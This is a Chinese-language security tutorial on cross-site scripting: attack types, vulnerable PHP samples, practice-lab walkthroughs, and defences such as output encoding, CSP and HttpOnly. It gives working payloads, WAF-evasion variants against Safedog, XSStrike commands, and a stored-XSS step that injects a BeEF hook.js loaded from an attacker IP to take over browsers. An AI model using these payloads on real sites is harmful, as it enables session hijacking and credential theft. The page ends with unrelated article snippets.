当前位置: 首页 > article >正文

跨站脚本攻击(XSS)深度剖析:从原理到实战绕过及防御体系

时间2026年4月 仅限技术交流与学习一、XSS漏洞简介与危害跨站脚本攻击Cross Site Scripting缩写为XSS是一种常见的Web安全漏洞攻击者通过在网页中注入恶意脚本代码当用户浏览页面时脚本在受害者浏览器中执行从而达到窃取数据、劫持会话、钓鱼欺骗等目的。XSS与CSS样式表缩写冲突因此安全领域统一使用XSS表示跨站脚本攻击。核心原理Web应用未对用户提交的数据进行充分过滤或编码导致恶意代码被浏览器解析执行。攻击者可以构造包含JavaScript、HTML标签的载荷利用输出点触发攻击。主要危害盗取各类用户账号如后台管理员、网银账户、窃取Cookie中的SessionID实现会话劫持、控制企业敏感数据读取/篡改/删除、窃取商业机密、非法转账、强制发送恶意邮件、挂载木马、发起DDoS攻击通过重定向、控制受害者机器发起内网探测等。XSS可造成严重的数据泄露与权限失控。二、XSS攻击分类详解根据攻击数据持久化方式及触发机制XSS主要分为反射型XSS、存储型XSS和DOM型XSS。反射型与存储型是最常见的两种形态。反射型XSS非持久型反射型XSS的恶意脚本未存储至服务器而是通过URL参数、表单提交等方式将payload传给服务器服务器未经处理直接回显到响应页面导致浏览器执行。通常需要诱导用户点击恶意链接。典型高危场景搜索框、错误提示页面。代码审计案例存在漏洞的PHP代码?php // 1.php — 极度危险的反射型XSS示例 $xss $_GET[x]; echo $xss; // 直接输出用户输入没有任何过滤或实体编码 ?上述代码直接从GET参数中取值并输出到HTML中攻击者构造如下URL即可触发弹窗http://localhost/1.php?xscriptalert(1)/script。若将alert改为恶意hook脚本则危害升级。在线靶场案例Pikachu漏洞平台访问Pikachu反射型XSS模块http://111.230.104.121:8765/vul/xss/xss_reflected_get.php?messagetest。攻击者将message参数值改为scriptalert(XSS)/script页面直接弹出警告框。某些场景下输入框限制长度可通过修改URL参数或F12修改maxlength属性绕过。靶场下载推荐Pikachu靶场 GitHub仓库 | 在线示例IP仅用于教学建议本地搭建。存储型XSS持久型存储型XSS将恶意脚本持久存储在服务器数据库、文件等介质中每当用户访问包含该数据的页面时脚本自动执行。其危害远超反射型可形成蠕虫式传播。常见于留言板、评论、个人资料、订单备注等功能点。Pikachu存储型XSS案例访问http://111.230.104.121:8765/vul/xss/xss_stored.php在留言框输入载荷scriptalert(1)/script提交此后所有访问该留言板的用户都会看到弹窗。因为输入被存入数据库并在前端未编码输出。!-- 漏洞核心逻辑伪代码 -- ?php $message $_POST[message]; // 存入数据库未作过滤 INSERT INTO comments(content) VALUES($message); // 展示时直接输出 echo $row[content]; ?存储型XSS无需诱导点击特定链接影响范围广且持久留存是黑灰产窃取后台Cookie、植入恶意广告的重灾区。DOM型XSSDOM型XSS基于文档对象模型DOM的漏洞恶意代码并不经过服务端而是通过前端JavaScript直接操作DOM导致脚本执行。攻击者往往利用document.write、innerHTML、eval、location.hash等不安全的传递方式。典型示例http://victim.com/#img srcx onerroralert(1)前端读取hash并直接写入页面触发XSS。三、XSS综合实战jfdd靶场搭建与BeEF劫持利用为了深刻理解存储型XSS的实战威力以下通过jfdd军锋基地订单系统靶场配合BeEF框架演示完整的“网站劫持”攻击链。jfdd靶场搭建步骤1. 将jfdd源码放入phpstudy的WWW目录修改/jfdd/config.php中MySQL密码为root根据环境调整。2. 删除/jfdd/install/install.lock文件以便重新安装。3. 访问http://127.0.0.1/jfdd/install/install.php进行安装根据引导完成数据库初始化。4. 后台登录地址http://127.0.0.1/jfdd/admin/login.php使用安装时设置的账号登录。5. 前台访问http://127.0.0.1/jfdd/即可开始XSS漏洞复现。注靶场资料可从网盘获取链接: https://pan.baidu.com/s/10klyPf2M1-q8QcQQklo4Nw?pwd54dw 提取码: 54dw请自行预习存储型XSS注入重现在前台订单咨询或需求提交处具体需求输入框注入标准测试代码scriptalert(1)/script提交后管理员或客服在后台/jfdd/admin/login.php查看订单详情时脚本自动执行弹窗证明恶意代码已被存储至数据库并在管理后台触发可实现窃取Cookie等进一步操作。BeEF框架劫持攻击流程BeEF (Browser Exploitation Framework) 是一款专注于浏览器端攻击的强大工具Kali Linux 内置该框架。利用存储型XSS注入BeEF钩子hook.js可远程控制受害者浏览器执行命令、窃取信息、内网扫描等。操作流程文字版第一步在Kali中配置镜像源并安装/启动BeEF。命令beef-xss启动后默认监听3000端口Web管理界面地址http://127.0.0.1:3000/ui/panel默认用户名beef密码123456。第二步获取钩子脚本地址BeEF启动后显示Hook脚本为script srchttp://Kali_IP:3000/hook.js/script例如攻击者Kali的IP为192.168.220.128。第三步将钩子脚本作为存储型XSS载荷注入到fdd靶场的前台输入框需求框。提交Payloadscript srchttp://192.168.220.128:3000/hook.js/script。第四步管理员或任何用户访问包含该留言/订单的页面时浏览器会加载hook.js被控僵尸主机出现在BeEF控制面板的“在线浏览器”列表中。第五步攻击者在BeEF后台选中目标利用Commands模块执行重定向、获取Cookie、截图、弹出警告框、键盘记录甚至内网渗透。如使用Redirect浏览器跳转到恶意网站盗取凭据。// BeEF hook原理简析hook.js建立与BeEF服务器的持久化通信等待执行JS指令 // 注入后攻击者可发送任意命令真正实现“浏览器傀儡机”。通过该案例可见存储型XSS配合BeEF能够完全控制客户端浏览器危害程度极高。四、WAF绕过技术与手工进阶以安全狗为例实际渗透中目标常常部署Web应用防火墙(WAF)如安全狗、云锁等简单的scriptalert(1)/script会被拦截。绕过WAF的核心思想利用服务端解析与WAF检测规则的差异性混淆payload但保证浏览器仍能执行。以下归纳若干有效绕过技巧。标签语法替换不同标签绕过当WAF过滤了script标签可使用HTML5新标签或事件属性来触发XSS。以下payload可在安全狗未强化规则时绕过audio srcx onerroralert(47) audio srcx onerrorprompt(1); video srcx onerroralert(48) button onfocusalert(1) autofocus点击/button details open ontogglealert(1)这些标签利用onerror、onfocus、ontoggle等事件自动或交互触发js代码安全狗若未针对这些标签做深度检测则可绕过。ASCII码与字符编码绕过利用String.fromCharCode将十进制ASCII码转为字符串避免直接出现alert敏感词。details open ontoggleeval(String.fromCharCode(97,108,101,114,116,40,49,41)) !-- 97,108,101,114,116,40,49,41 对应 alert(1) --大小写混淆与换行/制表符绕过部分WAF对标签正则匹配不严谨可使用大写、混写、插入%0a、%0d、/、%09等绕过。ScRiPtalert(1)/sCrIpT img srcx onerror%0aalert%0a(1) A%09onmouseoveralert(1)XSS/A自动化绕过神器——XSStrikeXSStrike是一款功能强大的XSS检测与WAF绕过工具基于Python开发内置大量fuzzing payload并能智能分析反射点绕过各类过滤器。GitHub项目地址https://github.com/s0md3v/XSStrike安装与使用示例# 克隆项目并安装依赖 git clone https://github.com/s0md3v/XSStrike.git cd XSStrike pip install -r requirements.txt -i https://mirrors.aliyun.com/pypi/simple/ # 基础扫描检测反射型XSS python xsstrike.py -u http://localhost/1.php?xtest # fuzzer模式自动测试WAF绕过 python xsstrike.py -u http://localhost/1.php?x1 --fuzzer当目标受安全狗保护时XSStrike通过变异载荷、多层级编码、畸变语法生成绕过payload。工具输出效率评分可一键测试出可执行payload比如htM1%0aoNmoUseoVER%0d%0dconfirm()//大幅节省手工时间。实战场景中手工与工具结合才能对抗不断升级的防御规则。安全狗环境下的绕过验证未开启安全狗时普通script轻松弹窗开启安全狗后请求包含敏感标签立即拦截并返回“网站防火墙-您的请求带有不合法参数”。但使用audio、video或ASCII编码形式可绕过部分老版本规则实际对抗需持续测试新向量。五、代码审计视角XSS漏洞根源及挖掘思路从开发角度审计XSS主要关注“输入接收”和“输出上下文”。危险函数包括PHP中echo, print, print_r直接输出参数Java中out.print未编码Python Flask中render_template_string未转义JavaScript中innerHTML, document.write, eval等。安全编码应使用上下文敏感的编码策略HTML实体编码、JS编码、URL编码。典型漏洞代码模式div?php echo $_GET[callback]; ?/div // HTML上下文中未编码 scriptvar msg ?php echo $_GET[msg]; ?;/script // 突破引号闭合 a href?php echo $_GET[url]; ?link/a // javascript:伪协议审计时重点关注是否存在过滤不严仅过滤script忽略其他标签、是否使用htmlspecialchars但参数设置不当未转义单引号、DOM操作是否使用危险方法。通过动态交互测试可以快速定位XSS。六、综合防御与安全开发建议为了彻底杜绝XSS漏洞需要从开发、测试、运维三个层面构建纵深防御体系。1. 输出编码首要防御根据不同输出位置进行编码HTML上下文中使用实体编码htmlspecialcharsENT_QUOTES属性内需额外处理引号JavaScript上下文中使用JSON或十六进制编码CSS上下文中限制为纯数值。现代模板引擎Twig、Blade默认自动转义降低风险。2. 输入验证与过滤对输入进行白名单校验如数字、字母、特定格式避免黑名单过滤被绕过。富文本编辑器可使用专门的XSS过滤库如HTMLPurifier解析并剔除危险标签及属性。3. 重要的Cookie安全属性为Session Cookie设置HttpOnly属性阻止JavaScript读取Cookie防止会话劫持。同时设置Secure与SameSite属性加强防护。4. 内容安全策略(CSP)通过响应头Content-Security-Policy限制脚本加载域、禁止内联脚本执行即使存在XSS漏洞也无法执行恶意代码。推荐策略script-src self严格控制外部脚本。5. 使用XSS检测工具与自动化扫描在CI/CD流程中集成XSStrike、Arachni、Burp Suite被动扫描定期进行渗透测试。另外可部署WAF如安全狗、ModSecurity作为临时缓解方案但不可依赖。6. 安全开发规范与代码审计开发团队需建立XSS编码规范通过代码审计平台SonarQube扫描危险函数从源头降低漏洞引入。综合以上措施企业可显著降低XSS风险构建安全可靠的Web应用。七、XSS漏洞总结对比表XSS类型存储位置触发方式危害等级典型场景反射型XSSURL/请求参数非持久诱导点击恶意链接中搜索框、错误页、URL跳转存储型XSS数据库/文件系统访问包含恶意数据的正常页面高留言板、评论、个人资料、订单系统DOM型XSS客户端DOM恶意代码不经过服务器通过前端JS修改DOM中location.hash、innerHTML拼接八、Beef使用参考资料及链接BeEF (Browser Exploitation Framework) 是目前最专业的客户端浏览器攻击测试工具基于 Ruby 开发可配合 XSS 漏洞实现对目标浏览器的深度控制。下面给出一些参考链接⚡ 仅限授权测试 持续更新 30 权威链接1、官方与权威资源资源名称 / 描述链接地址BeEF 项目官网 – 首页、核心介绍、新闻与下载入口https://beefproject.com/Kali Linux 官方工具文档 (beef-xss) – 安装命令及说明https://www.kali.org/tools/beef-xss/GitHub 官方仓库 – 源代码、Issue 跟踪及最新开发版https://github.com/beefproject/beef2、中文教程 深度使用手册教程标题 / 来源链接地址长亭百川云 · 《揭秘最为知名的黑客工具之一BeEF》涵盖安装、config.yaml 配置、Hook 攻击模块https://rivers.chaitin.cn/blog/cqj5svp0lnedo7thpsq0阿里云开发者社区 · 《XSS利器之BeEF》代理配置、内置模块及 Metasploit 集成https://developer.aliyun.com/article/162048651CTO · 《XSS渗透测试实战BeEF神器的使用与技巧》模块化设计与传统XSS工具对比MSF结合方案https://edu.51cto.com/article/note/39545.htmlCSDN · 《如何使用 BeEF 黑客工具非常详细》零基础入门包含Google钓鱼、虚假通知栏、窃取Cookiehttps://blog.csdn.net/m0_71745484/article/details/150854064Geek-Blogs · 《Kali Linux 中的 BEEF浏览器漏洞利用框架全解析》网络配置、安全配置、Hook配置与常见问题https://geek-blogs.com/blog/kali-linux-beef/CN-SEC · 《黑客钓鱼工具BeEF》模块颜色分类绿色/橙色/红色及浏览器肉鸡控制原理http://cn-sec.com/archives/5057090.htmlSeebug (原Wooyun) · 《浏览器利用框架BeEF测试》参数配置、Metasploit集成、社会工程学模块https://paper.seebug.org/papers/Archive/drops2/浏览器利用框架BeEF测试.html腾讯云开发者社区 · 《工具的使用 | BeEF的使用》systemctl管理、Cookie窃取、网页重定向、社工弹窗https://cloud.tencent.cn/developer/article/1937028101Labs · 《Browser Exploitation Framework (BeEF)》英文实验教程包含Fake Flash Update钓鱼、Google Phishinghttps://www.101labs.net/comptia-security/lab-48-browser-exploitation-framework-beef/CSDN · 《基于BeEF的XSS钓鱼攻击与浏览器劫持实验》环境搭建钩子部署诱导用户访问全流程https://jl-zhenlaixiaowei.blog.csdn.net/article/details/151133956腾讯云 · 《Kali Linux Web渗透测试手册》5.5节利用XSS漏洞和BeEF控制目标浏览器https://cloud.tencent.com.cn/developer/article/13803813、BeEF Metasploit 集成配置指南 / 资源链接地址腾讯云 · 《kali下安装beef并联合Metasploit》修改config.yaml开启msgrpc、联合启动完整流程https://cloud.tencent.cn/developer/article/1705929Kali Linux Web 渗透测试视频第16课图文教程集成配置及管理后台使用https://www.shuzhiduo.com/A/VGzlMMQxJb/4、视频教学 · 在线课程视频名称 / 来源链接地址Class Central · Web Penetration Testing Workshop: XSS and BeEF31分钟视频讲解XSS攻击技术及BeEF实战应用https://www.classcentral.com/courses/free-video-web-penetration-testing-workshop-xss-and-beef-part-10-of-12-from-youtube-304429YouTube · BeEF Framework Tutorial (The Cyber Mentor)基础安装、hook注入及获取会话演示YouTube 搜索 “beef framework tutorial” 获取最新视频合集5、官方Wiki 快速参考文档链接地址BeEF Wiki (官方文档)https://github.com/beefproject/beef/wiki常见配置 (config.yaml 参数详解)https://github.com/beefproject/beef/wiki/Configuration 核心使用提示• 安装 (Kali) :sudo apt update sudo apt install beef-xss• 启动命令:sudo beef-xss(或beef-xss根据权限)• 默认登录: 用户beef, 密码可在初次启动时设置或查看/etc/beef-xss/config.yaml• Hook 脚本地址:http://你的IP:3000/hook.js结合 XSS 注入实现浏览器远控• 修改默认凭据: 编辑/etc/beef-xss/config.yaml中的 credentials 段落重启服务生效。⚠️ 免责声明与合规要求这里收集的所有链接、教程及工具使用说明仅供读者在获得明确授权的环境下进行教学、防御研究及安全评估。未经授权利用 BeEF 或 XSS 漏洞攻击他人系统属于违法行为可能触犯《中华人民共和国网络安全法》及相关国际法律法规。请使用者务必在法律允许范围内开展活动滥用技术造成的后果与本页面作者及资源提供方无关。重要提示以上所有攻击技术与绕过方法仅供安全研究与授权测试使用。未经许可对他人网站实施XSS攻击属于违法行为请严格遵守网络安全法。免责声明本文档内容仅用于信息安全教学与防御研究旨在帮助开发者与安全人员理解XSS攻击原理及防护措施。读者不得利用文中技术进行非法攻击活动任何因滥用技术造成的后果与本文作者及发布平台无关。请务必在法律允许范围内进行渗透测试并获得系统所有者的明确授权。© 2026 安全技术博客 | 纯技术分享助力Web安全建设

相关文章:

跨站脚本攻击(XSS)深度剖析:从原理到实战绕过及防御体系

时间:2026年4月 | 仅限技术交流与学习 一、XSS漏洞简介与危害 跨站脚本攻击(Cross Site Scripting,缩写为XSS)是一种常见的Web安全漏洞,攻击者通过在网页中注入恶意脚本代码,当用户浏览页面时…...

向量搜索查询返回空结果却无异常?EF Core 10中CosineSimilarity表达式树编译失败的静默降级机制揭秘

第一章:向量搜索查询返回空结果却无异常?EF Core 10中CosineSimilarity表达式树编译失败的静默降级机制揭秘现象复现与根本诱因 在 EF Core 10 中调用 CosineSimilarity 方法进行向量相似度检索时,若底层数据库(如 PostgreSQL pg…...

不同场景做MV该用什么工具?OhYesAI、VidMuse、Kaiber、Runway选型指南

核心前提结论:选择MV制作工具第一步,需要先明确核心需求是「给音乐配画面」还是「把内容做成视频」,两类需求对应完全不同的工具类型,选错工具无法解决核心问题。1. 独立音乐人/音乐博主MV工具选型 核心结论:独立音乐人…...

告别C盘!手把手教你将Node.js 16.15.1安装到D盘并配置全局模块路径

彻底解放C盘空间:Node.js 16.15.1自定义安装与全局模块管理全攻略 当你的C盘开始频繁弹出空间不足的警告,而Node.js的全局模块又像野草一样在系统目录疯长时,是时候重新思考开发环境的布局策略了。本文将带你深入探索如何将Node.js 16.15.1完…...

Claude Code 启动失败修复指南

Claude Code 启动失败修复指南 问题现象 在 Windows 系统上运行 claude 命令时出现以下错误: 程序"claude.exe"无法运行: 指定的可执行文件不是此操作系统平台的有效应用程序。 所在位置 C:\Users\XX\AppData\Roaming\npm\claude.ps1:14 字符: 3& &qu…...

5G/6G毫米波设计必看:如何用信道建模参数(RMS时延扩展、K因子)指导你的系统设计?

毫米波信道建模实战:从RMS时延扩展到波束成形的工程决策指南 当28GHz的毫米波信号穿过城市峡谷时,工程师小张发现基站接收到的信号强度波动剧烈——这并非设备故障,而是典型的空间选择性衰落现象。在5G/6G和Wi-Fi 7系统设计中,理解…...

VAE与扩散模型的reconstruction–generation dilemma

论文: https://arxiv.org/abs/2603.05630代码: https://github.com/tongdaxu/Making-rFID-Predictive-of-Diffusion-gFID.git很多做 latent diffusion 的人都见过一个很别扭的现象:你把 VAE 训练得很好,重建出来的图像非常清楚,rFID 也很好看…...

给TOY计算机加点‘料’:用Python为教学CPU设计新指令(比如乘法、跳转)

给TOY计算机加点‘料’:用Python为教学CPU设计新指令 在计算机科学教育中,TOY计算机是一个经典的教学模型,它简化了真实CPU的复杂性,让学生能够更容易理解计算机体系结构的基本原理。但正是这种简化,也让许多学习者感到…...

终极解决方案:如何彻底修复CK2中文乱码问题

终极解决方案:如何彻底修复CK2中文乱码问题 【免费下载链接】CK2dll Crusader Kings II double byte patch /production : 3.3.4 /dev : 3.3.4 项目地址: https://gitcode.com/gh_mirrors/ck/CK2dll 你是否曾经在《十字军之王II》中创建了一个充满东方韵味的…...

Steam成就管理终极指南:如何用SteamAchievementManager掌控你的游戏成就

Steam成就管理终极指南:如何用SteamAchievementManager掌控你的游戏成就 【免费下载链接】SteamAchievementManager A manager for game achievements in Steam. 项目地址: https://gitcode.com/gh_mirrors/st/SteamAchievementManager SteamAchievementMana…...

初入编程门的小白对未来方向的期望!

#include <stdio.h>int main() {printf("hello world!");return 0;}0.小白选手的自我介绍我是来自江西省内一所双非的大一新生&#xff0c;自从初中开始了解到一些程序员和黑客的故事就开始对这一行业心驰神往&#xff0c;虽然家中没有任何资源提供给我&#x…...

为什么你的C# 14 AOT版Dify客户端在ARM64上崩溃?3类NativeAOT互操作雷区+2个[UnmanagedCallersOnly]避坑模板

第一章&#xff1a;为什么你的C# 14 AOT版Dify客户端在ARM64上崩溃&#xff1f;3类NativeAOT互操作雷区2个[UnmanagedCallersOnly]避坑模板ARM64平台上的NativeAOT&#xff08;.NET 9 C# 14&#xff09;编译器会彻底剥离JIT和运行时反射能力&#xff0c;导致传统P/Invoke与回调…...

用增量学习对抗‘遗忘’:在TE过程数据集上复现论文《Fault diagnosis of TE process based on incremental learning》

增量学习在TE过程故障诊断中的实战应用&#xff1a;从数据预处理到模型对抗遗忘 TE过程&#xff08;Tennessee Eastman process&#xff09;作为化工领域的经典仿真数据集&#xff0c;长期以来为故障诊断算法提供了标准测试平台。当我们将目光投向工业场景中的真实需求时&#…...

mysql如何设计个人名片系统_mysql图文混合存储方案

优先用传统字段而非JSON存名片数据&#xff1a;文字类字段拆列并建索引&#xff0c;图片存相对路径&#xff0c;动态字段用扩展表&#xff0c;搜索用前缀匹配拼音字段&#xff0c;通知异步解耦&#xff0c;富文本须过滤XSS。用 TEXT 还是 JSON 字段存名片图文混合数据&#xff…...

Harmonyos状态管理6:@Watch

物联网设备监控系统 - @Watch 演示 核心功能 @Watch 装饰器使用: 为 device 状态添加 @Watch(onDeviceStatusChange) 监听 当设备状态变化时自动触发回调函数 物联网设备数据: 设备信息:ID、名称、类型 状态信息:在线状态、信号强度 传感器数据:温度、湿度、气压 时间信息…...

Harmonyos状态管理5:@Observed @ObjectLink

物联网设备监控示例 数据结构 Device 设备类: 基本信息:id, name, type 状态信息:status(包含 online 在线状态、signal 信号强度) 传感器数据:data(包含 temperature 温度、humidity 湿度) 位置信息:location(包含 building 楼栋、room 房间) 功能演示 父组件 - 设…...

检测 Python 游戏中三位随机数的数字重复情况并计算胜率倍数

本文教你如何将 random.randint(100, 999) 生成的三位整数拆解为各位数字&#xff0c;高效判断是否存在重复数字&#xff08;如 112、333&#xff09;&#xff0c;并量化重复程度&#xff08;双重复/三重复&#xff09;&#xff0c;从而为游戏逻辑提供可编程的胜率倍数变量。 …...

计算机视觉入门:什么是计算机视觉及核心应用场景

计算机视觉入门&#xff1a;什么是计算机视觉及核心应用场景&#x1f4da; 本章学习目标&#xff1a;深入理解什么是计算机视觉及核心应用场景的核心概念与实践方法&#xff0c;掌握关键技术要点&#xff0c;了解实际应用场景与最佳实践。本文属于《计算机视觉教程》计算机视觉…...

22岁天才小伙破解“AI黑箱“:融合DeepSeek思路,参数效率翻倍!

本报讯 人工智能领域近日传来震动性消息&#xff1a;一位年仅22岁的年轻创业者&#xff0c;仅凭公开资料和对"第一性原理"的深刻理解&#xff0c;竟成功推导出了Anthropic公司号称"捂得最严实"的Claude Mythos大模型核心架构&#xff0c;并将完整代码开源至…...

技术日报|金融终端FinceptTerminal夺冠,WiFi信号实时人体姿态估计工具RuView亮相榜单

&#x1f31f; TrendForge 每日精选 - 发现最具潜力的开源项目 &#x1f4ca; 今日共收录 10 个热门项目&#x1f310; 智能中文翻译版 - 项目描述已自动翻译&#xff0c;便于理解&#x1f3c6; 今日最热项目 Top 10 &#x1f947; Fincept-Corporation/FinceptTerminal 项目简…...

GPT Pro悄悄升级速度暴增4倍,网友热议GPT-5.5何时到来?

本报讯 近日&#xff0c;大批ChatGPT Pro用户在社交媒体上发现自家AI助手发生了"神突变"——模型响应速度大幅提升&#xff0c;代码生成和视觉理解能力明显增强&#xff0c;而OpenAI方面却未进行任何官方公告。这场"静默革命"正在悄然改变大模型的竞争格局…...

上线当天注册接口被刷爆:我用滑块验证码 + 请求指纹把羊毛党拦在了网关层

上线当天注册接口被刷爆&#xff1a;我用滑块验证码 请求指纹把羊毛党拦在了网关层 上线第三个小时&#xff0c;注册接口的 QPS 从平时的 120 飙到 3800。验证码服务炸了&#xff0c;短信账单直接刷了半个月的预算。我打开监控面板&#xff0c;看到一波 IP 地址每秒钟都在换&a…...

【会议征稿通知 | 西华大学主办 | IEEE出版 | EI 、Scopus稳定检索】第五届新能源系统与电力工程国际学术会议(NESP 2026)

第五届新能源系统与电力工程国际学术会议&#xff08;NESP 2026&#xff09; 2026 5th International Conference on New Energy System and Power Engineering 2026年5月22-24日 | 中国-成都 大会官网&#xff1a;www.icnesp.com 截稿时间&#xff1a;见官网&…...

adobe acrobat pro 2024 经常无故退出,是什么原因,是破解不成功,还是那个序列号到期了,如何解决?

adobe acrobat pro 2024 经常无故退出,是什么原因,是破解不成功,还是那个序列号到期了,如何解决? THIS APP HAS BEEN DISABLED This unlicensed Adobe app has been disabled Switch to genuine Adobe apps - at up to 57%- to get the latest features and functionality…...

【会议征稿通知 | 中南大学主办 | IEEE出版 | EI 、Scopus稳定检索】第七届计算机视觉、图像与深度学习国际学术会议(CVIDL 2026)

第七届计算机视觉、图像与深度学习国际学术会议&#xff08;CVIDL 2026&#xff09; 2026 7th International Conference on Computer Vision, Image and Deep Learning 2026年5月22-24日 | 中国-长沙 大会官网 &#xff1a; www.cvidl.org 截稿时间&#xff1a;见官网&…...

梯度增强物理信息神经网络 (gPINN)求解矩形薄板力学正反问题(Python代码实现)

&#x1f4a5;&#x1f4a5;&#x1f49e;&#x1f49e;欢迎来到本博客❤️❤️&#x1f4a5;&#x1f4a5; &#x1f3c6;博主优势&#xff1a;&#x1f31e;&#x1f31e;&#x1f31e;博客内容尽量做到思维缜密&#xff0c;逻辑清晰&#xff0c;为了方便读者。 ⛳️座右铭&a…...

养老系统|养老系统定制|AI养老系统成品

随着人口老龄化趋势的加剧&#xff0c;养老服务正从传统的单一照料向数字化、智能化方向转型&#xff0c;构建高效、精准的养老系统已成为行业发展的核心诉求。现代养老系统并非简单的信息记录工具&#xff0c;而是一个集资源调度、健康监测、服务流程管理于一体的综合性生态平…...

PCIe设备驱动简要示例

lspci/setpci命令lspci命令选项-t&#xff1a;显示总线树-k&#xff1a;显示所有设备的内核驱动-x:十六进制形式显示“标准配置头”(前64字节)-xxx&#xff1a;十六进制形式显示整个配置空间(256字节)-xxxx&#xff1a;十六进制形式显示4096字节扩展配置空间-b&#xff1a;总线…...

号令天下专业版:祸害磁场中间夹0有什么影响

祸害磁场中间夹入数字0所产生的影响&#xff0c;可从多个维度展开深入剖析。祸害磁场中间夹0究竟有着怎样的影响呢&#xff1f;祸害磁场的固有特性祸害磁场本身与数字0相结合&#xff0c;往往被视作带有一定负面能量。就拿祸害磁场来说&#xff0c;它通常和出色的口才紧密相连&…...

面向法律 Agent 的 Harness 不可否认性签名

面向法律 Agent 的 Harness 不可否认性签名 关键词:法律Agent、Harness执行沙箱、不可否认性签名、零知识证明、电子证据存证、智能合约、司法合规 摘要:随着生成式AI技术在司法领域的落地,法律AI Agent已经广泛应用于合同审查、证据梳理、文书生成、在线公证等场景,但电子…...